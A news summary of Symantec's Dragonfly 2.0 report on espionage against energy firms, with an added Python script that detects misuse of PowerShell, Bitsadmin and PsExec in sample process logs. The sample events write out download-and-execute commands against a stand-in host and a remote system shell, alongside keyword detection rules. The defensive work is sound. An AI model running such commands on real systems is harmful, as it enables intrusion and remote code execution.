Dragonfly, a cyber espionage group that has been active since at least 2011, may be preparing to launch new cyberattacks against energy companies, utilities and power grids in Europe and North America, according to cybersecurity solutions provider Symantec.
The "Dragonfly 2.0" campaign appears to have already started, Symantec said in a prepared statement. This campaign leverages multiple infection vectors to gain access to a network, including malicious emails, watering hole attacks and Trojanized software, Symantec indicated.
The earliest activity in the Dragonfly 2.0 campaign was a malicious email campaign that sent emails disguised as New Year's Eve party invitations to energy sector targets; these emails were sent in December 2015, Symantec noted.
Symantec cited other recent cyberattacks on the energy sector as context for the campaign; these are not attributed to Dragonfly in its report:
- Disruptions to Ukraine's power system in 2015 and 2016 that affected hundreds of thousands of people.
- Cyberattacks on the electricity grids in some European countries.
- Cyberattacks against companies that manage nuclear facilities in the United States.
Dragonfly appears to be interested in learning how energy facilities operate and in obtaining access to operational systems, Symantec stated. With that knowledge and access, the group would be in a position to sabotage or take control of energy systems if it chose to.
Although Symantec has identified and tracked Dragonfly's activity, the company pointed out that it has been unable to determine definitively who is behind the group. Symantec gave several reasons why attribution is difficult:
- Dragonfly uses generally available malware and "living off the land" tools such as PowerShell and Bitsadmin, so its tooling carries no signature unique to the group.
- Dragonfly does not use zero-day exploits and relies on publicly available tools; Symantec notes this could reflect a lack of resources or a deliberate effort to frustrate attribution.
- Some code strings in Dragonfly's malware are in Russian and others in French, which Symantec says suggests that one of the two languages may be a false flag.
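Because those binaries are legitimate Windows tools, blocking them outright is rarely an option and signature matching on the files themselves finds nothing; detection has to key on how they are invoked: a Bitsadmin transfer from an external URL, an encoded or hidden-window PowerShell command, or admin tooling launched by an email client. The script below is an added example and is not code from Symantec's report or from the Dragonfly campaign. It runs a handful of such rules over constructed, JSON-formatted process-creation events modelled loosely on Sysmon Event ID 1 fields. The rule patterns, the inclusion of PsExec (a commonly abused remote-execution tool not named in the article), and the sample hosts, users and addresses are all assumptions made for illustration.

```python
import base64
import json
import re

# Detection rules: (name, regex on the process image basename, regex on the
# command line). PowerShell and Bitsadmin are the tools named in the article;
# PsExec and the specific command-line patterns are assumptions about typical
# misuse, not observations from the campaign.
LOLBIN_RULES = [
    ("bitsadmin download from URL",
     r"^bitsadmin\.exe$", r"(?i)/transfer\b.*\bhttps?://"),
    ("powershell encoded command",
     r"^powershell\.exe$", r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"),
    ("powershell hidden window",
     r"^powershell\.exe$", r"(?i)\s-w(?:indowstyle)?\s+hidden\b"),
    ("psexec remote execution",
     r"^psexec(?:64)?\.exe$", r"\\\\\S+"),
]

# Parent processes that should almost never launch admin tooling directly.
OFFICE_PARENTS = {"outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe"}


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand argument (base64 of
    UTF-16LE text), or None if the command line has none or it does not decode."""
    m = re.search(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Return the list of findings (rule names) for one process-creation event."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmdline = event["cmdline"]
    findings = [name for name, image_re, cmd_re in LOLBIN_RULES
                if re.search(image_re, image) and re.search(cmd_re, cmdline)]
    # Encoded commands are opaque in the raw log; decode and inspect the payload.
    decoded = decode_encoded_command(cmdline)
    if decoded and re.search(r"(?i)\b(?:iex|invoke-expression|downloadstring|downloadfile)\b", decoded):
        findings.append("decoded payload fetches or executes remote content")
    # Context that raises confidence: a mail client spawning admin tooling.
    if findings and event["parent"].lower() in OFFICE_PARENTS:
        findings.append("spawned by an Office application")
    return findings


def scan(log_lines):
    """Parse one JSON event per line and return an alert for each event with findings."""
    alerts = []
    for line in log_lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        findings = analyze_event(event)
        if findings:
            alerts.append({"host": event["host"], "user": event["user"],
                           "cmdline": event["cmdline"], "findings": findings})
    return alerts


def build_sample_logs():
    """Constructed sample events (not real telemetry), shaped like Sysmon Event ID 1
    fields. The encoded PowerShell payload is generated here so that the base64 is
    genuinely UTF-16LE, as PowerShell itself expects."""
    payload = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')"
    encoded = base64.b64encode(payload.encode("utf-16le")).decode("ascii")
    events = [
        {"host": "ws-12", "user": "CORP\\jdoe", "parent": "outlook.exe",
         "image": "C:\\Windows\\System32\\bitsadmin.exe",
         "cmdline": "bitsadmin /transfer job /download /priority normal "
                    "http://203.0.113.5/update.exe C:\\Users\\jdoe\\AppData\\Local\\Temp\\update.exe"},
        {"host": "ws-12", "user": "CORP\\jdoe", "parent": "cmd.exe",
         "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
         "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand " + encoded},
        {"host": "srv-01", "user": "CORP\\svc_backup", "parent": "services.exe",
         "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
         "cmdline": "powershell.exe -NoProfile -File C:\\Scripts\\nightly-backup.ps1"},
        {"host": "ws-07", "user": "CORP\\admin", "parent": "explorer.exe",
         "image": "C:\\Tools\\PsExec.exe",
         "cmdline": "PsExec.exe \\\\scada-hmi-02 -u CORP\\admin -s cmd.exe"},
    ]
    return [json.dumps(e) for e in events]


if __name__ == "__main__":
    for alert in scan(build_sample_logs()):
        print(alert["host"], alert["user"], "->", "; ".join(alert["findings"]))
```

The benign scheduled backup script on srv-01 produces no alert, which is the point of matching on invocation details rather than on the binary: the same powershell.exe is expected on every host, and the signal is in the hidden window, the encoded payload, the external URL and the unusual parent process. In production the rules would be tuned against a baseline of what administrators and scheduled tasks legitimately run.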
To combat Dragonfly attacks, Symantec offered the following best practices:
- Use complex passwords that contain a mix of letters, numbers and special characters.
- Layer multiple, overlapping defensive systems so that no single technology or protection method is a single point of failure.
- Create and enforce a security policy that requires all sensitive data to be encrypted both at rest and in transit.
- Implement egress traffic filtering on perimeter devices so that only approved outbound connections reach the internet; this blocks the command-and-control and data-exfiltration traffic an intrusion depends on rather than all outbound traffic.
- Teach employees about the risks associated with phishing emails and other cyber threats.
Dragonfly represents "a highly experienced threat actor," Symantec stated. However, energy companies and other organizations that prepare for cyberattacks can minimize the risk of Dragonfly-related cyberattacks.